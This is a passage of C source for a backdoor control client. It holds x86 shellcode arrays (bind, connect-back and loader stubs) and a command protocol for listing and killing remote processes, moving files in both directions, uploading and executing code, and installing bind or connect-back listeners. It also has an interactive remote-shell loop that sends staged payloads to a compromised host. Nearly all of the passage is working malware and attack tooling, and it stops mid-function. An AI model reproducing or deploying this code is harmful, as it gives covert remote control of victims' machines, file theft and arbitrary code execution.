"\x55\x44\x50\x68\xA7\xBA\x49\x32\xFF\xD7"
"\x89\x55\x48\x50\x68\x4A\x65\x76\x47\xFF"
"\xD7\x89\x55\x40\x50\x68\xD2\xC7\xA7\x68"
"\xFF\xD7\x89\x55\x50\x50\x68\xD3\xC7\xA7"
"\xE8\xFF\xD7\x89\x55\x54\x50\x68\x9C\x95"
"\x1A\x6E\xFF\xD7\x89\x55\x58\x50\x68\x88"
"\x3F\x4A\x9E\xFF\xD7\x89\x55\x5C\x50\x68"
"\xB0\x49\x2D\xDB\xFF\xD7\x89\x55\x64\x50"
"\x68\x1F\x79\x0A\xE8\xFF\xD7\x89\x55\x98"
"\x50\x68\x16\x65\xFA\x10\xFF\xD7\x89\x55"
"\xEC\x50\x68\xFB\x97\xFD\x0F\xFF\xD7\x89"
"\x55\xF0\x50\x68\xEF\xCE\xE0\x60\xFF\xD7"
"\x89\x55\x6C\x50\x68\x8E\x4E\x0E\xEC\xFF"
"\xD7\x89\x55\x60\xC7\x06\x77\x73\x32\x5F"
"\xC7\x46\x04\x33\x32\x00\x00\x56\xFF\xD2"
"\x50\x68\x48\x0B\x4A\xC2\xFF\xD7\x89\x55"
"\x30\x50\x68\x69\xCB\xA8\xCA\xFF\xD7\x89"
"\x55\x2C\x50\x68\xE0\x2C\xF4\x2D\xFF\xD7"
"\x89\x55\x28\x50\x68\x08\x92\xE2\xED\xFF"
"\xD7\x89\x55\x34\x50\x68\xD9\x09\xF5\xAD"
"\xFF\xD7\x89\x55\xC0\x50\x68\xA4\x1A\x70"
"\xC7\xFF\xD7\x89\x55\xD0\x50\x68\xA4\xAD"
"\x2E\xE9\xFF\xD7\x89\x55\xD4\x50\x68\xE5"
"\x49\x86\x49\xFF\xD7\x89\x55\xD8\x50\x68"
"\xEC\xF9\xAA\x60\xFF\xD7\x89\x55\xC4\x50"
"\x68\xA4\x19\x70\xE9\xFF\xD7\x89\x55\xC8"
"\x50\x68\xB6\x19\x18\xE7\xFF\xD7\x89\x55"
"\xCC\x50\x68\xE7\x79\xC6\x79\xFF\xD7\x89"
"\x55\xDC\x50\x68\xCB\xED\xFC\x3B\xFF\xD7"
"\x89\x55\xBC\x50\x68\xF2\x6E\x06\x95\xFF"
"\xD7\x89\x55\xE0\x50\x68\x47\x2C\xBD\x19"
"\xFF\xD7\x89\x55\x90\x31\xC9\xC7\x06\x61"
"\x64\x76\x61\xC7\x46\x04\x70\x69\x33\x32"
"\x89\x4E\x08\x56\xFF\x55\x60\x50\x68\x0F"
"\xA7\x1E\x59\xFF\xD7\x89\x55\x94\x50\x68"
"\xA2\xC2\xE8\x97\xFF\xD7\x89\x55\xE4\x50"
"\x68\x0F\x8A\x48\x24\xFF\xD7\x89\x55\xA0"
"\x81\xC4\x00\x02\x00\x00\x61\xFF\x65\xA4"
"\xC3";
unsigned char bindb[]=
"\xE8\x46\x00\x00\x00\x31\xC0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xFF\x55\xC0\x89\x45"
"\xFC\x8B\x7D\xAC\x89\xF9\xB8\x02\x00\x20"
"\x5A\xAB\x31\xC0\xAB\xAB\xAB\x6A\x16\x51"
"\xFF\x75\xFC\xFF\x55\xD0\x31\xF6\x56\xFF"
"\x75\xFC\xFF\x55\xD4\xC3\x31\xF6\x56\xFF"
"\x75\xAC\xFF\x75\xFC\xFF\x55\xD8\x89\x45"
"\x04\x31\xC0\x40\xC3";
unsigned char connectb[]=
"\xE8\x46\x00\x00\x00\x31\xC0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xFF\x55\xC0\x89\x45"
"\x04\x80\x7D\xFC\x01\x75\x08\x68\x44\x44"
"\x44\x44\xFF\x55\x64\xC6\x45\xFC\x01\x31"
"\xD2\x52\x52\x68\x33\x33\x33\x33\x68\x02"
"\x00\x20\x5A\x89\xE1\xB2\x10\x52\x51\xFF"
"\x75\x04\xFF\x55\xC4\x8D\x64\x24\x10\x85"
"\xC0\x75\xD2\x40\xC3";
unsigned char small[]=
"\x60\xE9\x9E\x00\x00\x00\x59\x89\x4D\x8C"
"\xE8\x47\x45\x54\x4B\x31\xC9\xB1\x09\x8D"
"\x7D\x4C\xE8\x24\x00\x00\x00\xA1\x6A\x3D"
"\xD8\xD2\xC7\xA7\x68\xD3\xC7\xA7\xE8\x9C"
"\x95\x1A\x6E\x88\x3F\x4A\x9E\x8E\x4E\x0E"
"\xEC\xB0\x49\x2D\xDB\x72\xFE\xB3\x16\xEF"
"\xCE\xE0\x60\x5E\x55\x89\xC5\xE8\x4E\x00"
"\x00\x00\x5D\xE8\x07\x00\x00\x00\x77\x73"
"\x32\x5F\x33\x32\x00\xFF\x55\x60\x31\xC9"
"\xB1\x0A\x8D\x7D\xBC\xE8\x28\x00\x00\x00"
"\xCB\xED\xFC\x3B\xD9\x09\xF5\xAD\xEC\xF9"
"\xAA\x60\xA4\x19\x70\xE9\xB6\x19\x18\xE7"
"\xA4\x1A\x70\xC7\xA4\xAD\x2E\xE9\xE5\x49"
"\x86\x49\xE7\x79\xC6\x79\xF2\x6E\x06\x95"
"\x5E\x89\xC5\xE8\x02\x00\x00\x00\x61\xC3"
"\xAD\x55\x50\xE8\x47\x45\x54\x46\x89\xD0"
"\xAB\xE2\xF3\xC3\xE8\x5D\xFF\xFF\xFF";
char ForkProcessCommand[]=
"\x78\x56\x34\x12\x8F\x8F\x8F\x8F";
char ExecuteEpilogCommand[]=
"\x78\x56\x34\x12\x8E\x8E\x8E\x8E";
char UploadAndExecuteCommand[]=
"\x78\x56\x34\x12\x8C\x8C\x8C\x8C";
char ResetBackdoorCommand[]=
"\x78\x56\x34\x12\x86\x86\x86\x86";
char TerminateBackdoorThreadCommand[]=
"\x78\x56\x34\x12\x8A\x8A\x8A\x8A";
char TerminateBackdoorCommand[]=
"\x78\x56\x34\x12\x89\x89\x89\x89";
char DisplayTasksCommand[]=
"\x78\x56\x34\x12\x88\x88\x88\x88";
char TerminateRemoteProcessCommand[]=
"\x78\x56\x34\x12\x87\x87\x87\x87";
char UploadFileCommand[]=
"\x78\x56\x34\x12\x85\x85\x85\x85";
char DownloadFileCommand[]=
"\x78\x56\x34\x12\x84\x84\x84\x84";
char *hlp=
"tasks -display porcesses list\n"
"kill 999 -terminate porcess with PID 999\n"
"put c:\\file.txt -upload file.txt from local directory to c:\\ \n"
"put file.txt -upload file.txt to cmd shell current directory \n"
"get c:\\file.txt -download file.txt from c:\\ to local
directory\n"
"get file.txt -download file.txt from cmd shell current
directory \n"
"inst bind(1234) -fork,bind and listen on 1234 port\n"
"inst conn(1.2.3.4,1234,60) -fork,try connect to 1.2.3.4 1234
every 60s\n"
"upnex -upload and execute code\n"
"reset -reload the backdoor\n"
"kill -terminate the process\n"
"tkill -terminate the thread\n"
"epilog -execute the epilog\n"
"exit -disconnect\n";
int salir=0;
int command=0;
int Accepted;
int PID;
char path[MAX_PATH];
#ifdef _WIN32
typedef
WSAEVENT
(WSAAPI
*WSACreateEventf)(
void
);
typedef
int
(WSAAPI
*WSAEnumNetworkEventsf)(
IN SOCKET s,
IN WSAEVENT hEventObject,
OUT LPWSANETWORKEVENTS lpNetworkEvents
);
typedef
int
(WSAAPI
*WSAEventSelectf)(
IN SOCKET s,
IN WSAEVENT hEventObject,
IN long lNetworkEvents
);
WSACreateEventf pWSACreateEvent;
WSAEnumNetworkEventsf pWSAEnumNetworkEvents;
WSAEventSelectf pWSAEventSelect;
#endif
typedef struct
{
unsigned char b[2048];
unsigned long l;
}ri_b;
typedef struct
{
ri_b a;
ri_b *pr;
ri_b *ep;
ri_b *xor;
unsigned long host;
unsigned short port;
unsigned long sock;
unsigned long time;
unsigned char type;
unsigned char twsai;
unsigned char txor;
unsigned char tconn;
unsigned char tfork;
unsigned char taheap;
unsigned char tcheap;
unsigned char trheap;
unsigned char trpeb;
}ri_t;
typedef struct tagPROCESSENTRY32
{
unsigned long dwSize;
unsigned long cntUsage;
unsigned long th32ProcessID; // this process
void* th32DefaultHeapID;
unsigned long th32ModuleID; // associated exe
unsigned long cntThreads;
unsigned long th32ParentProcessID; // this process's parent
process
long pcPriClassBase; // Base priority of process's
threads
unsigned long dwFlags;
char szExeFile[MAX_PATH]; // Path
} PROCESSENTRY32;
int ri_cfg(ri_t *ra,char* base,char* opt,int sock,char* host,ri_b
*prolog,ri_b *epilog,ri_b *xor);
void ri_asm(ri_t *ra);
void ResetBackdoor(int sock)
{
send(sock,ResetBackdoorCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
printf("[+] Command accepted...\n");
else
printf("[-] Command not accepted...\n");
return;
}
void TerminateBackdoor(int sock)
{
send(sock,TerminateBackdoorCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
}
else
{
printf("[-] Command not accepted...\n");
}
return;
}
void ExecuteEpilog(int sock)
{
send(sock,ExecuteEpilogCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
salir=1;
}
else
{
printf("[-] Command not accepted...\n");
}
return;
}
void UploadAndExecute(int sock)
{
char buf[]=
"\x90\x90\x90\xc3";
send(sock,UploadAndExecuteCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
send(sock,buf,sizeof(buf),0);
}
else
{
printf("[-] Command not accepted...\n");
}
return;
}
void ForkProcess(int sock,char *option)
{
ri_t f;
if(ri_cfg(&f,"wsai",option,-1,"127.0.0.1",0,0,0)!=-1)
{
ri_asm(&f);
send(sock,ForkProcessCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
send(sock,f.a.b,f.a.l,0);
}
else
{
printf("[-] Command not accepted...\n");
}
}
return;
}
void TerminateBackdoorThread(int sock)
{
send(sock,TerminateBackdoorThreadCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
}
else
{
printf("[-] Command not accepted...\n");
}
return;
}
void DisplayTasks(int sock)
{
PROCESSENTRY32 pe32;
send(sock,DisplayTasksCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
printf("[+] Command accepted...\n");
else
{
printf("[-] Command not accepted...\n");
return;
}
printf("PID\t\tFileName\n\n");
send(sock,(char*)&PID,4,0);
recv(sock,(char*)&pe32,sizeof(pe32),0);
while(pe32.dwSize!=0xFFFFFFFF)
{
printf("%d\t\t%s\n",pe32.th32ProcessID,pe32.szExeFile);
send(sock,(char*)&PID,4,0);
recv(sock,(char*)&pe32,sizeof(pe32),0);
}
return;
}
void TerminateRemoteProcess(int sock)
{
send(sock,TerminateRemoteProcessCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
send(sock,(char*)&PID,4,0);
recv(sock,(char*)&PID,4,0);
if(PID==1)
printf("[+] Remote process terminated...\n");
else
printf("[-] Remote process not terminated...\n");
}
else
printf("[-] Command not accepted...\n");
return;
}
void UploadFile(int sock,char* fFileName)
{
FILE *fp;
int ic;
char mc[]="|/-\\|/-\\";
unsigned long flen,fpos;
unsigned char RemoteFile[0x300];
for(ic=0;ic<strlen(fFileName);ic++)
{
if(fFileName[ic]=='\n')
fFileName[ic]=0;
if(fFileName[ic]=='\r')
fFileName[ic]=0;
}
ic=0;
if(strstr(fFileName,"\\"))
{
fp=fopen(strrchr(fFileName,'\\')+1,"rb");
strncpy(RemoteFile,fFileName,0x300);
}
else
{
fp=fopen(fFileName,"rb");
strncpy(RemoteFile,path,0x300);
strncpy(strrchr((char*)RemoteFile,'\\')+1,fFileName,0x300-strlen(RemoteFile));
}
if(fp!=0)
{
printf("[+] Local file opened...\n");
send(sock,UploadFileCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
send(sock,RemoteFile,0x300,0);
recv(sock,(char*)&PID,4,0);
if(PID==1)
printf("[+] Remote file opened...\n");
else
{
printf("[-] Unable to open remote file...\n");
return;
}
fpos=0;
fseek(fp, 0, SEEK_END);
flen = ftell(fp);
fseek(fp, 0, SEEK_SET);
while(flen-fpos>0xFF)
{
fread(RemoteFile+1, 0xFF,1,fp);
fpos+=0xFF;
RemoteFile[0]=0xFF;
send(sock,RemoteFile,0x100,0);
recv(sock,(char*)&PID,4,0);
if(ic==8)
ic=0;
printf("\rUploading file... %c",mc[ic]);
ic++;
}
fread(RemoteFile+1, flen-fpos,1,fp);
RemoteFile[0]=flen-fpos;
send(sock,RemoteFile,0x100,0);
fclose(fp);
printf("\r[+] Upload completed...\n");
}
else
printf("[-] Command not accepted...\n");
}
else
printf("[-] Unable to open local file...\n");
return;
}
void DownloadFile(int sock,char* fFileName)
{
FILE *fp;
int ic;
unsigned long buflen;
char mc[]="|/-\\|/-\\";
char RemoteFile[0x300];
for(ic=0;ic<strlen(fFileName);ic++)
{
if(fFileName[ic]=='\n')
fFileName[ic]=0;
if(fFileName[ic]=='\r')
fFileName[ic]=0;
}
ic=0;
if(strstr(fFileName,"\\"))
{
fp=fopen(strrchr(fFileName,'\\')+1,"w+b");
strncpy(RemoteFile,fFileName,0x300);
}
else
{
fp=fopen(fFileName,"w+b");
strncpy(RemoteFile,path,0x300);
strncpy(strrchr(RemoteFile,'\\')+1,fFileName,0x300-strlen(RemoteFile));
}
if(fp!=0)
{
printf("[+] Local file opened...\n");
send(sock,DownloadFileCommand,8,0);
printf("[+] Command sent...\n");
recv(sock,(char*)&Accepted,4,0);
if(Accepted==0x0A0A0A0A)
{
printf("[+] Command accepted...\n");
send(sock,RemoteFile,0x300,0);
recv(sock,(char*)&PID,4,0);
if(PID==1)
printf("[+] Remote file opened...\n");
else
{
printf("[-] Unable to open remote file...\n");
return;
}
send(sock,(char*)&PID,4,0);
recv(sock,RemoteFile,0x100,0);
while((RemoteFile[0]&0xff)!=0)
{
fwrite(RemoteFile+1, RemoteFile[0]&0xff,1,fp);
send(sock,(char*)&PID,4,0);
recv(sock,RemoteFile,0x100,0);
if(ic==8)
ic=0;
printf("\rDownloading file... %c",mc[ic]);
ic++;
}
fclose(fp);
printf("\r[+] Download completed...\n");
}
else
printf("[-] Command not accepted...\n");
}
else
printf("[-] Unable to open local file...\n");
return;
}
/*
void getread(void *ala)
{
int l;
char buf[512];
int sock=(int)ala;
char *p,*p_end,*h;
while(!salir)
{
if(!command)
{
ZeroMemory(buf,sizeof(buf));
l=recv(sock, buf, sizeof (buf),0);
if(strstr(buf,":\\")&&strstr(buf,">"))
{
p=strstr(buf,":\\");
if(p_end=strstr(p,">"))
{
for(h=p;p<p_end;h++)
{
if(h[0]=='>')
{
h[0]=0;
if(strlen(p)<MAX_PATH)
{
h--;
p--;
if(h[0]=='\\')
strcpy(path,p);
else
{
strcpy(path,p);
strcat(path,"\\");
}
h++;
}
h[0]='>';
break;
}
}
}
}
if (l==-1)
salir=1;
printf("%s",buf);
}
else
{
#ifdef _WIN32
Sleep(1000);
#else
sleep(1);
#endif
}
}
printf("Connection Closed\n");
_endthread();
}
*/
//---------------------------------------------------------------------------
unsigned char ri_xor(ri_t *ra,int xpos)
{
int p,i,end=0;
unsigned char c,t;
for(c=0;c<0xff;c++)
{
for(p=xpos;p++;p<ra->a.l)
{
t=ra->a.b[p]^c;
for(i=0;i<ra->xor->l;i++)
{
if(t==ra->xor->b[i])
{
p=ra->a.l+4;
break;
}
}
if(p==ra->a.l)
end=1;
if(p>ra->a.l)
break;
}
if(end==1)
break;
}
return c;
}
int ri_addr(char* host)
{
unsigned long fhost;
struct hostent *hp;
if((fhost=inet_addr(host))==-1||(fhost=inet_addr(host))==0){
if((hp=gethostbyname(host))==NULL)
{
printf("[-] Gethostbyname error...\n");
return -1;
}
memcpy(&fhost,hp->h_addr,4);
}
return fhost;
}
//---------------------------------------------------------------------------
void LoadProcedures()
{
#ifdef _WIN32
HANDLE hLib;
hLib=LoadLibraryA("ws2_32.dll");
if(hLib)
{
pWSACreateEvent=(WSACreateEventf)GetProcAddress(hLib,"WSACreateEvent");
pWSAEnumNetworkEvents=(WSAEnumNetworkEventsf)GetProcAddress(hLib,"WSAEnumNetworkEvents");
pWSAEventSelect=(WSAEventSelectf)GetProcAddress(hLib,"WSAEventSelect");
}
#endif
return;
}
//---------------------------------------------------------------------------
void CloseConnection(int sock)
{
#ifdef _WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
printf("Connection Closed\n");
exit(1);
return;
}
//---------------------------------------------------------------------------
void ri_shell(int sock)
{
#ifdef _WIN32
HANDLE hevt[2],hinp,hout;
WSADATA wsa;
WSANETWORKEVENTS wsa_e;
WSAEVENT e;
#endif
fd_set fds;
char *p_end,*p,*h;
int file,cnt,t,i,j,mode=1;
unsigned long off=0;
unsigned char buf[512];
unsigned long answer,l;
#ifdef _WIN32
LoadProcedures();
#endif
if (send(sock,(char *)managerb,sizeof(managerb),0)<=0)
{
printf("[-] Manager send failed...\n");
exit(1);
}
printf("[+] Manger send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Manager not accepted...\n");
exit(1);
}
printf("[+] Manager accepted...\n");
#ifdef _WIN32
Sleep(1000);
#else
sleep(1);
#endif
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
if(answer==0x01010101)
{
if (send(sock,(char *)full,sizeof(full),0)<=0)
{
printf("[-] Init buffer send failed...\n");
exit(1);
}
printf("[+] Init buffer send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Init buffer not accepted...\n");
exit(1);
}
printf("[+] Init buffer buffer accepted...\n");
#ifdef _WIN32
Sleep(1000);
#else
sleep(1);
#endif
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
}
if(answer==0x02020202)
{
if (send(sock,(char *)shell,sizeof(shell),0)<=0)
{
printf("[-] Shell buffer send failed...\n");
exit(1);
}
printf("[+] Shell buffer send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Shell buffer not accepted...\n");
exit(1);
}
printf("[+] Shell buffer buffer accepted...\n");
#ifdef _WIN32
Sleep(1000);
#else
sleep(1);
#endif
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
}
if(answer==0x03030303)
{
if (send(sock,(char *)loader,sizeof(loader),0)<=0)
{
printf("[-] Loader send failed...\n");
exit(1);
}
printf("[+] Loader send success...\n");
#ifdef _WIN32
hinp=GetStdHandle(STD_INPUT_HANDLE);
hout=GetStdHandle(STD_OUTPUT_HANDLE);
e=pWSACreateEvent();
hevt[0]=hinp;
hevt[1]=(HANDLE)e;
#endif
while(1){
#ifdef _WIN32
pWSAEventSelect(sock,e,FD_READ|FD_CLOSE);
i=WaitForMultipleObjects(2,hevt,FALSE,INFINITE)-WAIT_OBJECT_0;
FD_ZERO(&fds);
if(i==1){
FD_SET((unsigned long)sock,&fds);
pWSAEnumNetworkEvents(sock,e,&wsa_e);
}
if(i==0){
FD_SET(0,&fds);
}
pWSAEventSelect(sock,e,0);
ioctlsocket(sock,FIONBIO,&off);
#else
fflush(stdout);
FD_ZERO(&fds);
FD_SET(sock,&fds);
FD_SET(0,&fds);
select(FD_SETSIZE,&fds,NULL,NULL,NULL);
#endif
if(FD_ISSET(sock,&fds))
{
if((cnt=recv(sock,buf,sizeof(buf),0))<=0)
{
printf("Connection Closed\n");
exit(1);
}
if(strstr((char*)buf,":\\")&&strstr((char*)buf,">"))
{
p=strstr((char*)buf,":\\");
if(p_end=strstr(p,">"))
{
for(h=p;p<p_end;h++)
{
if(h[0]=='>')
{
h[0]=0;
if(strlen(p)<MAX_PATH)
{
h--;
p--;
if(h[0]=='\\')
strcpy(path,p);
else
{
strcpy(path,p);
strcat(path,"\\");
}
h++;
}
h[0]='>';
break;
}
}
}
}
#ifdef _WIN32
WriteFile(hout,buf,cnt,(unsigned long *)&i,NULL);
#else
write(1,buf,cnt);
#endif
}
if(FD_ISSET(0,&fds)){
memset(buf,0,sizeof(buf));
#ifdef _WIN32
ReadFile(hinp,buf,sizeof(buf),(unsigned long *)&cnt,NULL);
#else
cnt=read(0,buf,sizeof(buf));
#endif
if(l==-1)
{
printf("Connection Closed\n");
exit(1);
}
else
{
if(!strncmp(buf,"exit\n",5)||!strncmp(buf,"exit\r\n",6))
{
send(sock,buf,cnt,0);
CloseConnection(sock);
}
else if(!strncmp(buf,"help\n",5)||!strncmp(buf,"help\r\n",6))
{
printf("\n%sPath=\"%s\"\n",hlp,path);
printf("\n%s>",path);
}
else if(!strncmp(buf,"reset\n",6)||!strncmp(buf,"reset\r\n",7))
{
ResetBackdoor(sock);
printf("\n");
}
else if(!strncmp(buf,"kill\n",5)||!strncmp(buf,"kill\r\n",6))
{
TerminateBackdoor(sock);
printf("\n");
}
else
if(!strncmp(buf,"epilog\n",7)||!strncmp(buf,"epilog\r\n",8))
{
ExecuteEpilog(sock);
printf("\n");
}
else if(!strncmp(buf,"upnex\n",6)||!strncmp(buf,"upnex\r\n",7))
{
UploadAndExecute(sock);
printf("\n%s>",path);
}
else if(!strncmp(buf,"inst bind(",10)||!strncmp(buf,"inst
conn(",10))
{
ForkProcess(sock,buf+5);
printf("\n%s>",path);
}
else if(!strncmp(buf,"tkill\n",6)||!strncmp(buf,"tkill\r\n",7))
{
TerminateBackdoorThread(sock);
printf("\n");
}
else if(!strncmp(buf,"tasks\n",6)||!strncmp(buf,"tasks\r\n",7))
{
DisplayTasks(sock);
printf("\n%s>",path);
}
else if(!strncmp(buf,"kill ",5))
{
if(sscanf(buf,"kill %d\n",&PID)==1||sscanf(buf,"kill
%d\r\n",&PID)==1)
{
TerminateRemoteProcess(sock);
printf("\n%s>",path);
}
else
printf("\n%s>",path);
}
else if(!strncmp(buf,"get ",4)&&strlen(buf)>5)
{
DownloadFile(sock,buf+4);
printf("\n%s>",path);
}
else if(!strncmp(buf,"put ",4)&&strlen(buf)>5)
{
UploadFile(sock,buf+4);
printf("\n%s>",path);
}
else
send(sock,buf,cnt,0);
}
}
}
}
}
//---------------------------------------------------------------------------
/*
void ri_shell(int sock)
{
unsigned char buf[512];
unsigned long answer,l;
if (send(sock,(char *)managerb,sizeof(managerb),0)<=0)
{
printf("[-] Manager send failed...\n");
exit(1);
}
printf("[+] Manger send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Manager not accepted...\n");
exit(1);
}
printf("[+] Manager accepted...\n");
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
if(answer==0x01010101)
{
if (send(sock,(char *)full,sizeof(full),0)<=0)
{
printf("[-] Init buffer send failed...\n");
exit(1);
}
printf("[+] Init buffer send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Init buffer not accepted...\n");
exit(1);
}
printf("[+] Init buffer buffer accepted...\n");
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
}
if(answer==0x02020202)
{
if (send(sock,(char *)shell,sizeof(shell),0)<=0)
{
printf("[-] Shell buffer send failed...\n");
exit(1);
}
printf("[+] Shell buffer send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0||answer!=1)
{
printf("[-] Shell buffer not accepted...\n");
exit(1);
}
printf("[+] Shell buffer buffer accepted...\n");
if (send(sock,(char *)initb,8,0)<=0)
{
printf("[-] Init send failed...\n");
exit(1);
}
printf("[+] Init send success...\n");
if (recv(sock,(char*)&answer,sizeof(answer),0)<=0)
{
printf("[-] Version recv failed...\n");
exit(1);
}
printf("[+] Version recv success...\n");
}
if(answer==0x03030303)
{
if (send(sock,(char *)loader,sizeof(loader),0)<=0)
{
printf("[-] Loader buffer send failed...\n");
exit(1);
}
printf("[+] Loader buffer send success...\n");
_beginthread(getread,4096,(void*)sock);
while(!salir)
{
l = read (0,buf, sizeof (buf));
if(l==-1)
salir=1;
else
{
if(!strncmp(buf,"exit\n",5))
salir=1;
else if(!strncmp(buf,"help\n",5))
{
command=1;
printf("\n%sPath=\"%s\"\n",hlp,path);
command=0;
printf("\n%s>",path);
}
else if(!strncmp(buf,"reset\n",6))
{
command=1;
ResetBackdoor(sock);
printf("\n");
command=0;
}
else if(!strncmp(buf,"kill\n",5))
{
command=1;
TerminateBackdoor(sock);
printf("\n");
command=0;
}
else if(!strncmp(buf,"epilog\n",7))
{
command=1;
ExecuteEpilog(sock);
printf("\n");
command=0;
}
else if(!strncmp(buf,"upnex\n",6))
{
command=1;
UploadAndExecute(sock);
command=0;
printf("\n%s>",path);
}
else if(!strncmp(buf,"inst bind(",10)||!strncmp(buf,"inst
conn(",10))
{
command=1;
ForkProcess(sock,buf+5);
command=0;
printf("\n%s>",path);
}
else if(!strncmp(buf,"tkill\n",6))
{
command=1;
TerminateBackdoorThread(sock);
printf("\n");
command=0;
}
else if(!strncmp(buf,"tasks\n",6))
{
command=1;
DisplayTasks(sock);
command=0;
printf("\n%s>",path);
}
else if(!strncmp(buf,"kill ",5))
{
if(sscanf(buf,"kill %d\n",&PID)==1)
{
command=1;
TerminateRemoteProcess(sock);
command=0;
printf("\n%s>",path);
}
else
printf("\n%s>",path);
}
else if(!strncmp(buf,"get ",4)&&strlen(buf)>5)
{
command=1;
DownloadFile(sock,buf+4);
command=0;
printf("\n%s>",path);
}
else if(!strncmp(buf,"put ",4)&&strlen(buf)>5)
{
command=1;
UploadFile(sock,buf+4);
command=0;
printf("\n%s>",path);
}
else
{
l=send((int)sock,buf,l,0);
if(l == -1)
salir=1;
}
}
}
}
}
*/
//---------------------------------------------------------------------------
int ri_bind(unsigned short port)
{
int sock,len;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock)
{
printf("[-] Socket error...\n");
exit(1);
}
printf("[+] Socket open...\n");
local.sin_family = AF_INET;
local.sin_port = port;
local.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock,(struct sockaddr *)&local,16)!=0)
{
printf("[-] bind error...\n");
exit(1);
}
printf("[+] bind success...\n");
if(listen(sock,1)!=0)
{
printf("[-] listen error...\n");
exit(1);
}
printf("[+] listen success...\n");
if((sock = accept(sock,(struct sockaddr *)&local,&len))==-1)
{
printf("[-] accept error...\n");
exit(1);
}
printf("[+] connection accepted...\n");
return sock;
}
//---------------------------------------------------------------------------
int ri_conn(unsigned long host,unsigned short port)
{
int sock;
struct sockaddr_in addr;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock)
{
printf("[-] Socket error...\n");
exit(1);
}
printf("[+] Socket open...\n");
addr.sin_family=AF_INET;
addr.sin_port=port;
addr.sin_addr.s_addr=host;
if(connect (sock, (struct sockaddr *) &addr, sizeof (addr)))
{
printf("[-] Connect error...\n");
exit(1);
}
printf("[+] Connection established...\n");
return sock;
}
//---------------------------------------------------------------------------
void ri_usage(char* app)
{
printf("Usage:\n%s host port\n%s port\n%s conn(host,port)\n%s
bind(port)\n",app,app,app,app);
}
//---------------------------------------------------------------------------
int ri_net_cfg(int nargc, char* narg0,char* narg1,char* narg2)
{
unsigned long tmp,len,pos,i;
char host[20],port[10];
unsigned long fhost;
unsigned short fport;
struct hostent *hp;
if(nargc>=1)
{
len=strlen(narg1);
for(i=0;i<len;i++)
{
if(narg1[i]==',')
{
pos=i;
narg1[i]=0;
}
else if(narg1[i]==')')
narg1[i]=0;
}
pos++;
}
if(nargc==2)
{
if(atoi(narg2)==0||atoi(narg2)>0xFFFF)
{
printf("[-] Wrong port...\n");
exit(1);
}
printf("[+] Port correct...\n");
fport=htons(atoi(narg2));
if((fhost=ri_addr(narg1))==-1)
exit(1);
printf("[+] Address correct...\n");
return ri_conn(fhost,fport);
}
else
if(nargc==1&&strncmp(narg1,"conn(",5)==0&&sscanf(narg1,"conn(%20s",host,port)==1&&sscanf(narg1+pos,"%6s",port)==1)
{
if(atoi(port)==0||atoi(port)>0xffff)
{
printf("[-] Wrong port...\n");
exit(1);
}
printf("[+] Port correct...\n");
fport=htons(atoi(port));
if((fhost=ri_addr(host))==-1);
exit(1);
printf("[+] Address correct...\n");
return ri_conn(fhost,fport);
}
else if(nargc==1&&sscanf(narg1,"bind(%d)",&tmp)==1)
{
